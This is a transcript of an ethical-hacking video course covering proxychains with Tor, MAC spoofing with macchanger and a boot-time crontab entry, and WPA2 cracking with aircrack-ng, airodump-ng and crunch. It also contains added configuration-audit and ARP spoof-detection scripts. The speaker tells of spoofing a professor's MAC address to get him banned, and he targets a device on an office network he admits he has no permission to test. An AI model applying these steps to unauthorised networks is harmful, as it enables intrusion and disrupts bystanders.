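# removing them, in a throwaway directory. All names are constructed.

demo_create_and_remove() {
    work=$(mktemp -d) || return 1
    cd "$work" || return 1
    touch file1 file2 file3            # three empty files in one go
    mkdir movies                       # a directory
    echo "hello world" > phone.txt     # > creates (or truncates) the file
    echo "second line" >> phone.txt    # >> appends instead of overwriting
    created=$(ls | wc -l | tr -d ' ')  # 5 entries

    rm file1                           # a plain file goes without a prompt
    # rm refuses a directory unless -r is given; record that refusal.
    if rm movies 2>/dev/null; then dir_refused=no; else dir_refused=yes; fi
    rm -r movies                       # recursive removal: gone for good
    remaining=$(ls | wc -l | tr -d ' ')
    lines=$(wc -l < phone.txt | tr -d ' ')
    cd / && rm -rf "$work"
    printf '%s %s %s %s\n' "$created" "$dir_refused" "$remaining" "$lines"
}

demo_create_and_remove     # 5 yes 3 2
```

The refusal on a bare rm movies is the safety net the video mentions; rm -r removes the directory with no second chance, so the habit worth building is to ls the path first and to write the full path, as in rm /var/address.txt, rather than relying on where you think you are.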

Okay, another way to get help for any command that you want is man. And suppose you want to see what rm does, man rm will show everything about rm that is there to show you. It'll show you how to use it, it'll give you a description, synopsis, name: remove files and directories. It's a very useful way, so out here you see the manual page. So that is what man means, manual, and you can scroll through it, and you can press q to quit. So that's very much helpful.

OK guys. So that was all about the command line interface and how we can use it to go about the operating system and change file permissions, copy files, move files and a bunch of other stuff. Now it's time to get on with the interesting stuff, and that is, firstly, we're going to be learning how you can actually stay anonymous with proxychains. OK guys. So now that we are done with the command line basics, it's time that we move forward with proxychains. So before we move forward with proxychains, let us head back to the PowerPoint presentation and see what exactly proxychains are. Okay.

So proxychains. Now as the name suggests, proxychains are basically a chain of proxies. Now, where is a proxy used? A proxy is used whenever you want to anonymize yourself on the wire or the network. You do not want others to know what the source IP address was for your client system, and to do this, all you have to do is send your packet through a bunch of intermediary systems, and these intermediary systems carry the packet out and they transmit it to the target system. And this is much slower. Let's see how we can use this in Kali Linux now, in combination with Tor, in order to anonymize not only web browsing traffic but rather all network-related traffic generated by pretty much all applications, but you can also change this in the settings.

Now, what we're going to do is we're going to open up the proxychains configuration file and we're going to understand all its options that are available. So to do that, all you have to do is say nano, you go into the /etc folder and then you go for the proxychains.conf, and what you see out here is the Nano editor, and we had spoken about the Nano editor when we were discussing the CLI part. I hope you haven't skipped that. Now what you see out here is a bunch of instructions and options. So let me just zoom into the command line interface, and now you can read everything much better.

So what proxychains is, well, it gives you the ability rather to route your traffic through a series of proxy servers and stay anonymous in such a fashion by hiding behind them, or by having them forward your request, so it looks like on the other side that your requests are coming from them as opposed to you. Now surprisingly enough, there are a large amount of these proxy servers out there that you can use, but they're not very stable, you know, they go up and down, and they're not very fast. So for specific targets they can be useful, but not for brute forcing and not for any sort of computing attack. So suppose you're doing something to a certain target, like trying to log in or you're already logged in, you can definitely do it through proxychains, and it will be reasonably fast and reasonably stable as well. But if you're doing some sort of mass scanning, or you're brute forcing a password or something of the kind with a proxy chain with a list of proxies selected from the internet, especially the free proxies, it's not going to work. I mean it's going to work out eventually in a technical sense, but it will consume more time than you can spare, and by that I mean it can be a very, very long time. It can take about a month or two to do a simple scan. So that's not an option, and there are other ways of doing that, but for the time being I just want you to know how you can use proxychains and how you can configure it, because it's really useful and I use it fairly often, a lot of people do, and it's a fantastic piece of software.

So first off we have the types of proxies. So you see HTTP, SOCKS4 and SOCKS5. Now, there are fundamental differences between these protocols, and you always want to find yourself a SOCKS5 proxy, as that's the best possible one, and that has the ability to anonymize all sorts of traffic. HTTP, well, as the name says, it's for HTTP traffic, and SOCKS4 is very similar to SOCKS5 but it does not support the IPv6 protocol and it does not support the UDP protocol. So SOCKS4 can be rather problematic, and you always want to make sure that you're using SOCKS5 wherever and however. Anyway, down below you have these other options, which we will go over.

So basically how you enable these options is that you don't need to type some complex lines of code or anything of any kind; basically all you have to do is just remove the hash out here. I'll show you. So suppose we want to actually activate the dynamic_chain option. So all we have to do is delete the hash. But let's put in the hash right now. So after you delete the hash, all you have to do is save the file and the option is enabled. This hash represents a commented-out line, meaning that the system reading this will ignore it if there is a hash, and if there isn't a hash it will take it into consideration and interpret it accordingly.

Anyway, what we have here are statements which allow us to specify how we want our traffic to be routed. First off we have dynamic_chain. Dynamic chain is an option which you will find people using the most, it is the most commonly used option and a preferable one too, at that, and honestly I think it's the best one out there, primarily because it's the most stable one, and here's why. Now suppose you have A, B, C, D proxies. So those are some servers with IP addresses with open ports. And if you have a strict chain policy, which is enabled on this computer right now as you see, if you have a strict chain policy, we will only be able to access any site on the Internet in general by going through A, B, C, D. So you have to go through all of them, and you have to go through them in that specific order, that is A, B, C, D, and that's not always a good thing. I mean if you're paying for five proxies, that's not a problem, because they will always be operational and they will always be up, and why not, that's not a bad idea or an option. But there are however people who use proxies for free and they don't tend to pay for them. Why would you pay for like five proxies for a simple scan or something of that kind? They're not free, they cost money, and they're rather expensive also. But still, I mean the act of paying itself identifies you, and kind of diminishes the amount of anonymity you have on the internet. So some complex payment methods can still be used to actually anonymize yourself, but it's fairly simple to just use a dynamic chain.

So firstly we're going to go ahead and uncomment the dynamic_chain option, and we're going to comment out the strict_chain option. So strict chain will no longer be used, and I will be using dynamic chains. And one more thing to note here is that if you want to use proxychains in combination with Tor, if you want to route all your traffic through the Tor network, not just web traffic, you must be enabling dynamic chains. I mean, there's a chance that it will work with strict chains, but given the inherent instability of Tor nodes, it is highly unlikely. You will need dynamic chains, and that is why I'm using them. Anyway, if you're using dynamic chains, it just gives you the ability to go from A, B, C, D to your desired destination by not having to adhere to any order. So let's say C is down, and you would go A, B, D, and it would work with no problems. Even if B was down you would go to A, D, and you would still reach the destination. So as long as one single proxy is functional, it's going to work, and you don't require any specific order to do it.

Down below now, down below you have some other options too. So first is random_chain. Now random chains in effect are basically the same thing as resetting your service. I mean if you're resetting your Tor, you will now be assigned a new IP address, and Tor assigns you a new IP address every 10 minutes or so. Anyway, with the random chain you can specify a list of IPs and then you can tell your computer, okay, I want you to try and I want you to connect to this point, and every time you connect, every time you transmit a packet, I want you to use a different proxy, and we can do that as well. And that's one of the options definitely, and you can say okay, use this one five times and then change to another one, or something like that. There are a lot of options to specify there, namely the chain length. Anyway, down below there's quiet_mode. You don't really need that. Then there's proxy_dns: proxy DNS requests, no leak for DNS data. This is very important. You cannot have any DNS leak, and let me explain to you what DNS leaks are. Even though somebody cannot get your particular IP address, they can get the IP address of the DNS server that you are using, and what DNS servers do is resolve the domain name to the IP address and vice versa. So for example, if you type in youtube.com, the DNS server of your local ISP will resolve that into some sort of IP address that YouTube has, and it will make a request. No problem, and you do not want that happening, because your local DNS server will be discovered, and that is information that can be used in order to figure out your personal IP address. And when that is done your physical location is pretty much compromised. And that's no good, and you definitely need proxy_dns here. It might slow you down a bit, but without that you're practically not anonymous, and it's just a matter of time before somebody finds you.

Now, if you go down below we have some other options here, but we're not really interested in them at the moment. What we are here for are the formats for entering proxies, and I'm going to leave it at that.

So what you see out here is first the type of the proxy, that is socks5, then the IP address, then the port number, and then two words, 'lamer secret', and then 'justu hidden'. Okay. So now what you see out here, as I just said, is how you would actually write down your proxy chains. And now, as I had already also said, you always want to be using SOCKS5 and you don't want to be using HTTP, because they're not really that safe, and SOCKS4 doesn't support a lot of things anyway. And this is the IP address of the proxy server, and we will enter a few of them manually later on, and this here is the port number that you see, on which the proxy server is listening, and that port is open. Over here, these two words: now some proxy servers, especially paid ones, will always have a username and password, so you can just type them here in plain text, and fortunately it is assumed that only you and you alone have access to this computer, besides this file... and besides, this file, as you know, everybody can read this file anyway. So if you can just type in the username here and the password here, you will gain access to a certain proxy that you have chosen or that you have paid for. Anyway, these are just some examples and we won't actually be using these proxies or anything of the kind.

We need to go down below, here you see, at the end of the file. So if I just press Enter a couple of times, there we go. So here is only one proxy active at the moment, and it says socks4, and all traffic is routed here through Tor by default. So that goes to Tor now, and Tor listens on this port. So this 9050 is the port that Tor listens on. Now, what we want to do is we want to add a socks5 proxy address. So what you want to do is just type in socks5 and the same IP address, socks5, and you want to be keeping the spacing correct, just use Tab. So 127.0.0.1, and then you want to specify the port number also, so now 9050. So what you see out here, the 127.0.0.1, this is the loopback address of your computer. So this is for any device communication, and if you're pinging this address, you're pinging yourself basically, and usually people ping this address in order to make sure that the IP protocol is set up correctly, even though they don't have internet connectivity. So let's just type in 127.0.0.1 and the same port number, 9050. So now we have to press Ctrl+O to save our file. You can save under the same name, and "wrote 65 lines" of course, down there, and that's written, and now you have to press Ctrl+X and you exit out.

So let's press Ctrl+L and clear our screen. Now, we just edited our proxychains configuration in a very neat environment. So go ahead and type in service tor status. So we want to check the status of our Tor. So service tor status, so "tor service could not be found". So do we have the Tor service installed? Okay, so the Tor service is not installed. Just give me a little moment, I'll quickly install it. Okay.

So now that we have set up our proxychains configuration file, and we have put in a socks5 proxy chain giving it the Tor service, now what we need to do first is start up our Tor service. Now to actually check if Tor is running or not, or if the Tor service is running or not, let me just clear that out, we need to go service tor status. And you see it says it's inactive. So what you have to do is say service tor start, and that will start the Tor service. It might take some time depending on the system that you're using, and there it is, it has started for me.

Now what you have to do to actually use proxychains before you go to any website, so all I have to do is say proxychains, then you specify the browser that you're using, so we're going to be using Firefox, and you could say something like www.duckduckgo.com. So now here you will see how your ping is being transmitted to duckduckgo.com. When I say ping, I mean your packets and your requests, I'm sorry for my vocabulary. So now your packets are going to be directed through a bunch of IP addresses, but we haven't actually put a bunch of IP addresses, we just have put the loopback for the Tor network. So we will let Tor do the rest of the things for us. Okay, so depending on your system this might take a little bit of time to actually open up. Okay.

So let's go ahead and see what's actually happening on the terminal while this thing is loading up. Okay, as you can see it's going through a bunch of proxies out here, and some are denying it and some are saying it's okay. So as you guys can see, most of the time you might get denied, and it will be OK on a lesser number of occasions, and that is exactly what we're looking for, because primarily we have gone to a great extent for the anonymity, and what we want to do is stay like that. So this is basically how you use proxychains. Now if this computer just decides to open up duckduckgo.com on Mozilla, I could actually show you some interesting stuff, but it seems my computer has kind of given up on actually opening DuckDuckGo, it's still waiting for duckduckgo's confirmation, but that's about it. So this is how you can actually configure proxychains. I'm really sorry that my computer isn't working so well right now, and nothing is actually opening on Mozilla. It's mostly because my RAM is overloaded. I think I should go ahead and get myself new RAM.

But for now, let me just also say that we can put in some custom proxy lists, and instead of just saying, let me just go ahead and open up that file again, as you guys can see out here. I'm going to end this right now because my computer can't really take all this pressure. See, it's like so hard. Okay. Let me just quit out of that and let me just open up a new one. Now as I had said, you can put up some custom proxy lists. I'm not really gonna do that, but let me just show you how you can do that. You go nano and you go /etc and proxychains.conf, so you basically have to go into the proxychains config. Okay, so I think I should put this, can... yeah. Now if you just go in and edit out here, all you have to do is set up dynamic_chain, and you can go online and search for a free proxy list, and that will give you everything from the port number to the IP address. Let me just show it to you, free proxy server list. So all you have to do is search for free proxy server list, and you can see out here the proxy type is HTTPS, and you basically want to find a SOCKS5 proxy; to find a SOCKS5 proxy just add that into your keyword. And once you find those proxy addresses, all you have to do is take down this IP address followed by the port number, and you go ahead and just put it down in this configuration file, and then you hit Ctrl+O and you just save it, and you just go back. So that was all about proxychains and how you can set up proxychains to make yourself very anonymous.
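A small audit script for the proxychains.conf settings discussed above, an added example that is neither from the video nor part of the proxychains project: it strips comments the way proxychains itself ignores them, then reports which chain mode is active, whether proxy_dns is enabled (if not, name lookups bypass the chain, which is the DNS leak described above), and which proxy types the list uses. The configuration text is constructed to mirror the layout of the real file, and a second function applies the same edits the video makes so the weak and corrected versions can be compared.

```shell
#!/bin/sh
# Added example (not from the video or the proxychains project): audit a
# proxychains.conf for chain mode, proxy_dns and proxy types. The config text
# is constructed to mirror the real file's layout.

sample_conf() {
    cat <<'EOF'
# proxychains.conf  VER 3.1
#
#dynamic_chain
strict_chain
#random_chain
#chain_len = 2
#quiet_mode
#proxy_dns
tcp_read_time_out 15000
tcp_connect_time_out 8000
[ProxyList]
# add proxy here ...
#        socks5  192.168.67.78   1080    lamer   secret
socks4  127.0.0.1 9050
EOF
}

# The same file after the edits made in the video: dynamic_chain uncommented,
# strict_chain commented out, proxy_dns enabled, and a socks5 entry for Tor.
fixed_conf() {
    sample_conf | sed -e 's/^strict_chain/#strict_chain/' \
                      -e 's/^#dynamic_chain/dynamic_chain/' \
                      -e 's/^#proxy_dns/proxy_dns/' \
                      -e 's/^socks4/socks5/'
}

# Drop comments and blank lines: only what proxychains itself would read.
active_lines() { sed -e 's/#.*//' -e '/^[[:space:]]*$/d'; }

# Reads a config on stdin and prints "<mode> <dns-status> <proxy-types>".
audit_proxychains() {
    conf=$(active_lines)
    mode=$(printf '%s\n' "$conf" | grep -E '^(dynamic|strict|random)_chain' | head -n 1)
    if printf '%s\n' "$conf" | grep -q '^proxy_dns'; then
        dns=proxy_dns
    else
        dns=DNS-LEAK-RISK     # resolver queries would go out unproxied
    fi
    types=$(printf '%s\n' "$conf" | awk '/^(socks4|socks5|http)[ \t]/ { print $1 }' \
            | sort -u | tr '\n' ',')
    printf '%s %s %s\n' "${mode:-no-chain-mode}" "$dns" "${types%,}"
}

sample_conf | audit_proxychains   # strict_chain DNS-LEAK-RISK socks4
fixed_conf  | audit_proxychains   # dynamic_chain proxy_dns socks5
```

Run against a real file with `audit_proxychains < /etc/proxychains.conf`. The comment-stripping step matters: a line such as "#proxy_dns" looks enabled when you skim the file but counts for nothing, which is exactly the mistake the audit is meant to catch.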

I'm sorry hold muscle, uh,

pardon work that's still


sad state of my computer

but moving on let's go ahead


and study about Max changes.

OK guys.

So that was all


about proxy chains.

Let's move ahead


to match changer.

Okay. Now before we go into the tool called macchanger, let's just see what a MAC address is. A MAC address actually stands for media access control address of a device, and it is a unique identifier assigned to a network interface controller for communication purposes. Now, MAC addresses are used as a network address for most IEEE 802 network technologies, including Ethernet, Wi-Fi and Bluetooth. In this context, MAC addresses are used in the medium access control protocol sublayer, and as typically represented, MAC addresses are recognizable as six groups of two hexadecimal digits each. Now, these are separated by a colon, and the first three groups are actually the organizationally unique identifier, so they actually represent your vendor, and the next three hexadecimal groups actually represent your network card uniquely.

Okay, so when you are actually on a network you are recognized in something called an ARP table. Let me just show you the ARP table and how you can see it. Let's go in; so the password is root. Still, an ARP table is basically an address resolution protocol table. And well, this is a virtual machine and it doesn't really know many machines on the local network. But if I were to go on my Windows system and show you my ARP table, let's see. Okay, so if I show you the ARP table of my Windows machine: on any machine that has a TCP/IP protocol suite installed you will have this command called arp, and you give it -a, and now you see that your IP address, or somebody else's IP address, is actually mapped to a physical address. Now, the MAC address is very commonly used in the ARP protocol, and this is how you are actually identified on a network.
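The ARP table shown above is also where a network administrator would notice the spoofing described in this section. As an added example (not code from the course), here is a script that reads an `arp -a` style dump, splits each MAC into the OUI and the card-specific part exactly as described above, and flags two things a defender looks for: one MAC address answering for several IP addresses, and addresses with the locally administered bit set (the second-lowest bit of the first group), which vendor-assigned addresses do not have and randomised or hand-picked ones usually do. The `arp -a` output is constructed with hypothetical hosts, and OUI_VENDORS is a two-entry stand-in for the IEEE registry that the vendor list in macchanger comes from.

```python
"""Check an ARP table for signs of MAC spoofing.

Added example; not code from the course. The `arp -a` output below is
constructed (hypothetical hosts), and OUI_VENDORS is a two-entry stand-in
for the IEEE OUI registry.
"""
import re
from collections import defaultdict

# Constructed sample in the layout Windows `arp -a` prints.
SAMPLE_ARP_OUTPUT = """\
Interface: 192.168.1.23 --- 0xb
  Internet Address      Physical Address      Type
  192.168.1.1           00-11-22-aa-bb-01     dynamic
  192.168.1.40          08-00-27-3c-9d-5e     dynamic
  192.168.1.41          08-00-27-3c-9d-5e     dynamic
  192.168.1.77          f6-c6-49-12-34-56     dynamic
  224.0.0.22            01-00-5e-00-00-16     static
"""

# Stand-in OUI table: first three groups -> vendor (the real list is the IEEE registry).
OUI_VENDORS = {
    "08:00:27": "PCS Systemtechnik (VirtualBox)",
    "00:11:22": "ExampleVendor (constructed)",
}

_ENTRY = re.compile(
    r"^\s*(\d{1,3}(?:\.\d{1,3}){3})\s+"           # IPv4 address
    r"([0-9a-fA-F]{2}(?:[-:][0-9a-fA-F]{2}){5})"   # MAC, dash or colon separated
    r"\s+(\w+)"                                     # dynamic / static
)


def normalize_mac(mac):
    """Return the MAC as lowercase, colon-separated groups of two hex digits."""
    digits = re.sub(r"[^0-9a-fA-F]", "", mac).lower()
    if len(digits) != 12:
        raise ValueError(f"not a 48-bit MAC address: {mac!r}")
    return ":".join(digits[i:i + 2] for i in range(0, 12, 2))


def split_mac(mac):
    """(OUI, card-specific part): the vendor half and the unique half."""
    mac = normalize_mac(mac)
    return mac[:8], mac[9:]


def is_locally_administered(mac):
    """Bit 0x02 of the first octet: set on addresses not assigned by a vendor."""
    return bool(int(normalize_mac(mac)[:2], 16) & 0x02)


def is_multicast(mac):
    """Bit 0x01 of the first octet: group addresses, never a single host."""
    return bool(int(normalize_mac(mac)[:2], 16) & 0x01)


def vendor_of(mac):
    return OUI_VENDORS.get(split_mac(mac)[0])


def parse_arp_table(text):
    """Return [{"ip", "mac", "type"}, ...] for every entry line in the dump."""
    entries = []
    for line in text.splitlines():
        m = _ENTRY.match(line)
        if m:
            entries.append({"ip": m.group(1), "mac": normalize_mac(m.group(2)), "type": m.group(3)})
    return entries


def find_anomalies(entries):
    """Duplicate MACs (one card answering for several IPs), locally administered
    MACs, and MACs whose OUI is not in the vendor table; multicast rows are skipped."""
    by_mac = defaultdict(list)
    for e in entries:
        if not is_multicast(e["mac"]):
            by_mac[e["mac"]].append(e["ip"])
    return {
        "duplicate_macs": {mac: ips for mac, ips in by_mac.items() if len(ips) > 1},
        "locally_administered": [e["ip"] for e in entries if is_locally_administered(e["mac"])],
        "unknown_vendor": [e["ip"] for e in entries
                           if not is_multicast(e["mac"]) and vendor_of(e["mac"]) is None],
    }


if __name__ == "__main__":
    for key, value in find_anomalies(parse_arp_table(SAMPLE_ARP_OUTPUT)).items():
        print(f"{key}: {value}")
```

In the constructed table, 192.168.1.40 and 192.168.1.41 share one MAC, which is what the college impersonation story above would look like from the administrator's side, and 192.168.1.77 carries a locally administered address, which is what a randomised MAC looks like.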

Now sometimes what you want to do is be unknown on this network. There are various reasons why you want to do that. Let me just give you an example of a very malicious reason that was done in my college. So we as students would actually change the MAC address of our own computer to the professor's computer. So we would somehow look up the professor's IP address and then come to know about his MAC address, and then we would spoof our MAC to be his MAC address, and then we would do some type of malicious activity on the college internet, and then the internet administrators of our college would come to know that that MAC address is doing some sort of malicious activity, and that MAC address would get permanently banned for that session on the college network. So basically our professor would not be able to use the wireless projectors that he would use to actually show us his presentations, and we would end up getting a free class. Now, I am not actually promoting any sort of bad activity like this. I have just experienced this in my own college life. So that was something, but there are many other reasons that you might want to spoof your MAC. Now macchanger is an amazing tool for actually spoofing your MAC.

So first of all, how do you come to know your MAC address? So let's see, you go ifconfig. This will give us our MAC address. Now this address that you see out here is the MAC address of this machine. So you can also check out the MAC address by going macchanger, then let's type in the help option, and this will show us how to get the MAC address. So if you see, there's a show flag, so we can go macchanger and you can put the -s, and then you put the interface. Now the interface is where it's working, so eth0 is where we are actually getting it; we don't want the loopback one. So eth0, and this will give us the MAC address. So the current MAC address is 08:00:27... Let's see if that was the same one shown. Where is that? Okay, so 08:00:27, so, I'm sorry, this was the MAC address. I selected the wrong thing. What I was showing you is the IPv6 address, and you can see that's very, very long. So, this is our MAC address.

Now what you might want to do is change your MAC address. Well, let's see: with -V we can get the version, with -s you can show, we can do the -e. And as I said, if you remember, the first three groups are about the vendors, so you can also get the vendor list by going -l. So you go -l, and this will give you a list of MAC addresses and which vendor they belong to. So sometimes, if you don't know the vendors that are actually being used on the network of your college, for example, and you want to just stay anonymous and not raise any flags of suspicion, you could hide yourself as a Cisco router. So suppose your college was using all sorts of Cisco routers and you decided that today, I'm going to put myself as a Cisco router and I'm going to screw around with the network. So it would not raise any flags before you actually decide to do some malicious activity; in some deeper inspection of your MAC address people would actually realize that you are actually spoofing the address, and after some investigation it would take some time to actually reach you and how you spoofed it, but the advantage of changing the MAC is not raising any flags, and that is exactly what you should try to do. So macchanger is also very useful for getting the list of all the MAC addresses and the vendor IDs.

Now, let me just clear the screen out quickly. So we go clear, and let's bring back the help. So we go macchanger --help. Now, what we want to do is give ourselves a random MAC address. Now with macchanger, that is done with the -r flag, and we want to do it on eth0. So once you run that, you will be given a new MAC address. So our new MAC address is f6:c6:49..., and now you can verify that by running ifconfig. Now we could just do ifconfig, and you see our new MAC address is on the "ether" line, so we could also do something like this: ifconfig, and you could grep ether. So that's just telling you the MAC address, and this is completely new. Also, you can show it through the macchanger tool itself. Okay, so we need to give it the eth0. I've got that now. You see that this is our current MAC address and this is the permanent MAC address, and the two are completely different.

Sometimes you also might want to actually change your MAC when your laptop or your system is booting up, because you might want to stay anonymous all the time. Who knows. And sometimes you might think, I'll actually change it when I want to change it, but let's face it, we are forgetful as human beings and we tend to forget things that we are supposed to do. So what else is better than to actually automate the whole process yourself and forget about remembering all these stupid nitty-gritty things. So you can tell Linux, or Kali in our case, to actually change your MAC address on boot-up using this tool called crontab. Now crontab is actually used for scheduling tasks on Linux. So let me show you how to do that. Firstly, let's clear our screen and go crontab and go --help. Now you see it's a pretty small menu. So first we start with the -u flag: that is the user this file is going to work for. Then we've got the -e flag, which is for editing the user's crontab. -l lists the user's crontab, and you can see the list of the user's crontab entries, and let's see: so do we have any crontab at all? So there is no crontab at this moment, so we can set up one for ourselves by going to the -e. Then there's the -r, which deletes the user's crontab, and I want to tell you all, be very careful when deleting anything of that sort, because once you delete something from Linux, as I've already said, it is very, very difficult to actually retrieve it back. You might get fragmented pieces of what you had actually deleted, and that will only leave you with sadness and devastation.

Now, what you want to do is go through crontab and press -e, and this will bring us to select an editor; to change it later on, use select-editor. So we'll do it with nano. So what you have out here is the readme file of crontab, and if you read this entire thing you will get how to use crontab completely. But if you have any sort of doubts even after reading it, you can leave them down in the comment section below. Now what you want to do is actually set up a crontab so that you can change your MAC address whenever you reboot your computer. So all you have to do is say @reboot, and what you want done is macchanger, and if you remember we want to randomize the MAC address, and we want it on eth0. So that's done. Now all you have to do is save this thing. So you go Ctrl+O, and that will write it out to your crontab, and you press Enter, and you have written one line. Now you go Ctrl+X to exit out of it. So now let us clear the screen by pressing Ctrl+L and Enter, and let's go ahead and get our MAC address. So if we go ahead and run that, our MAC address is set to f6:c6:49.... So just remember the first few letters, f6, c6 and 49. Now let me just reboot my computer, and you will see after I reboot and run ifconfig again with grep ether, we will see a different MAC address. Now rebooting may take some time because I'm actually using a virtual machine, but still, now it's giving problems with Firefox. But let's hope this won't take much time.

Okay. So now that our computer has booted up and we have actually opened up a terminal, let's go in and type ifconfig, and let's get our ether, that is the MAC address. So if you remember the MAC address, now you see that it has completely changed, and that's how you can spoof your MAC address on a local network. And this will basically help you in staying anonymous on ARP protocols and anything that actually maps your IP address to the MAC address. Okay, so that was all about macchanger; meet you in the next section.

So in this section we will be talking about wireless encryption protocol cracking. So that is basically Wi-Fi cracking. Now Wi-Fi in today's day and age uses PINs or passwords to normally encrypt the data usage. Basically, if you want to access the wireless access point, you need a password or a PIN to actually gain authorization. Now this authorization check is done using a four-way handshake, which we will try to capture using a tool called aircrack-ng, and then we will try to crack the password using a wordlist generator called crunch. Now, you can use aircrack-ng to crack WPA and WPA2. There's also another protocol called WEP, and that is not normally used these days. If you find anybody using that, you should always advise them to actually upgrade to WPA or WPA2, because WEP is actually very easily cracked these days, and people are generally punished for using WEP by hackers all around the world.

Okay. So now you can actually go ahead and go into a terminal and type ifconfig to actually look at your network card name. As you guys can see out here, it's called wlo1. So the first step that we need to do to actually go into the process of Wi-Fi cracking is to set up our network access card, or our access point, in monitor mode. So as you guys can see out here, after typing ifconfig, it shows me that my Wi-Fi access card is the wlo1 interface.

Now our process of cracking passwords is pretty simple. What we want to do is actually monitor for all sorts of access points that are nearby to us. Once we have chosen the access point that we want to actually penetrate into and find the password, what we want to do is run an airodump scan on it, and then we will try and deauthenticate any device that is connected to the access point. Now one assumption out here is that the password is saved in that device and it will automatically try to re-authenticate itself with the access point, and we want to catch and log this re-authentication process, which will actually have a four-way handshake between your device and the access point. So this is basically the procedure we are going to follow.

Now another thing that you need to know before actually using this process to gain any access to any Wi-Fi is that you need to know a little bit about what the password is. Maybe it could be the length, or it could be something like a specific character at a specific place; maybe you know a series of characters. So you just can't really guess the password out of thin air. That is not how cracking works, unless you have some unlimited potential of processing power; in that case you can very well brute force it and just find the password. But if you are not somebody who has unlimited processing power and you're trying to use aircrack-ng, you need to know a little bit about the password.

Also, before we proceed with this wireless encryption protocol cracking, what I want to say is: if you want to get into somebody's Wi-Fi network, or you want to actually test for vulnerabilities, it's better that you test for router vulnerabilities than actually cracking a Wi-Fi password, because you're more likely than not to find more router vulnerabilities than actually successfully crack a Wi-Fi password if you don't know anything about it. If you don't know anything about the password, just go ahead and run some vulnerability tests on the router itself, and more often than not you will just find something you can abuse.

Okay. Now let's talk about the two tools that I'm going to be using. Now, one of these two tools is already installed on Kali Linux, but if you are not using this on Kali, you can also use this on any Linux-based system. So what you have to do is download and install aircrack-ng, which is easily installed with the command apt-get install aircrack-ng, and you also have to install this wordlist generator called crunch. Now crunch is easily downloadable by just googling the name, and the first link will be a SourceForge link, and all you have to do is go inside that and install it, and once you've figured out how to install crunch, you can make sure that it's installed. Now once you have installed both pieces of software, you can check whether the manual pages are opening up. Let me just open the manual page of aircrack-ng and show you that it has been properly installed. Now as you guys can see, the manual page of aircrack-ng opened up, and the manual page of crunch is also opening up. So that means both of our tools have been successfully installed on our system.

Now before we go ahead, let me just show you how crunch actually works. So crunch is basically a wordlist generator. What you would do is try and generate a wordlist with given characters. So what you can see out here is I've typed in crunch 3 5, so that means the minimum length is 3 and the maximum length is 5, and I've given it a series of numbers. So it will use these numbers and generate all the words that are possible from length 3 to length 5. So the way we are going to use crunch in conjunction with aircrack is that we are going to use crunch to generate the wordlist, and then we are going to pipe the wordlist through aircrack-ng when we are actually trying to crack what we will capture in a certain log file.

Now what you want to do first is actually put your network interface card in monitor mode. Now you can do that by typing in ifconfig and then the interface name, which happens to be wlo1, and first you have to put it down. So: ifconfig wlo1 down. Now to put your interface card into monitor mode, you have to type in iwconfig, and you go the name of the interface, and then you go mode monitor. Okay, it seems I've spelled it wrong, so let me just do it once again. So that has put our network interface card into monitor mode, and what we need to do after that is start up our network interface. So all we have to do is type in ifconfig wlo1 up. Now, once it is up and running, you can check by typing in ifconfig that indeed your network interface card is up and running; don't worry, it is running in monitor mode if it's up and running.

What we want to do next is pretty important to the whole process. So what we want to do now is check for some services that might still be running in the background that might hamper our whole scanning process. So we do this by actually typing in the command airmon-ng check and then the name of the interface. So as you guys can see, nothing is exactly running right now. But if there were any processes running, you would only add the command airmon-ng check, and instead of writing the interface name, all you have to do is say kill. It will kill any processes. Now if you see any process named network manager, you want to kill that process first, separately, and then kill any other child processes. You may need to actually run this command a few times before all the processes are killed, and then you're good to go.

Okay. So now that we have finished killing all the subprocesses, what we want to do is run an airodump scan on the network card, so that is wlo1. So for this we go airodump-ng and then we put in the name of the interface. And this will start the scan, that will look something like this. So after you run the airodump scan on your interface, what you see out here is a result of all the access points that are found through the monitoring mode. Now if you see, we have a bunch of columns out here. First of all we have the BSSID column. Now, the BSSID column is basically the MAC address of all the routers that are found. Now, every router obviously has a MAC address. So those are the MAC addresses that are tied to the router names, which are shown by the ESSID. Then we have the PWR column, we have the Beacons column, we have the data packets column. Another important column is the channel column. It's important to know which channel your router is working on. Then we can see the cipher column, the authentication, so out here we can see the encryption that is used. So most of it is using WPA2. So what we will be cracking is basically WPA2. So from this, what you need to recognize is basically the Wi-Fi router that you want to crack into.

Now, I'm performing this particular test at my office, and I don't really have the permission to actually go in and test them for these vulnerabilities. I'm not a security analyst over here, so I don't really have the permissions to penetrate into them. So what I have done is I have run a similar test at home using my own Wi-Fi, and I will show you the results for that. But for this working example, you will see the scans that I'm running in this office. So as we intend to stay ethical, what we are going to do out here is capture whatever we find in our office only for educational purposes, but when we are doing the actual cracking step, that is the last step of this whole procedure, I'll be running it on a file that I had generated at home, as I just said, because I have permissions to do whatever I want with my own Wi-Fi and passwords.

Okay. So for this example, I'm going to pick this Wi-Fi, and it's running on channel number 6. So what you want to pick from here is the BSSID and the channel number; we need to remember these two things, first the BSSID and the channel number.

Now what you want to do after that is open up a new window on your terminal and log in as root. Now what we want to do here is run a separate airodump scan on this specific BSSID and check for all the devices that are actually connected to this access point. Now we do this by running the command airodump-ng, and while we're doing this, we also want to capture all the scan outputs that we actually get into a certain file. So we will actually be storing it in a file called capture, and then we just have to pass in the BSSID and the interface. We also have to specify the channel. So let's see what the channel is; so the channel is channel 6. So that's what we want to do, and we specify the channel with the -c flag. So after you have identified the MAC address, all you need to do is copy it down and place it after the --bssid flag. Okay, so we're going to run our command out here, and we just want to say our file is going to be, well, testcapture. Now that our scan is up and running, all you want to do is wait till someone is actually connected to this access point. So I forgot to mention this: for this process to actually work properly, somebody needs to be connected to that access point, because what we are going to try and do is disconnect that certain device and let them reconnect, and capture that in the log file.

Okay, so it seems like nobody is actually connecting to it. So at this time what I'm going to do is go back to our airodump scan that we had run on the network interface and look at some other MAC address or other access point to actually penetrate into, and let's see if something has actually connected to that. Okay, so, oh la la, now what you see out here is that somebody has actually connected to this access point, and his MAC address can be seen under the STATION tab. Now what we want to do is run the deauthentication broadcast message on that station and deauthenticate that guy. Now to actually run the deauthentication process, all you have to do is go ahead and open up a new terminal window again and let this scan be running in the background. Don't close any of the scans at this moment.

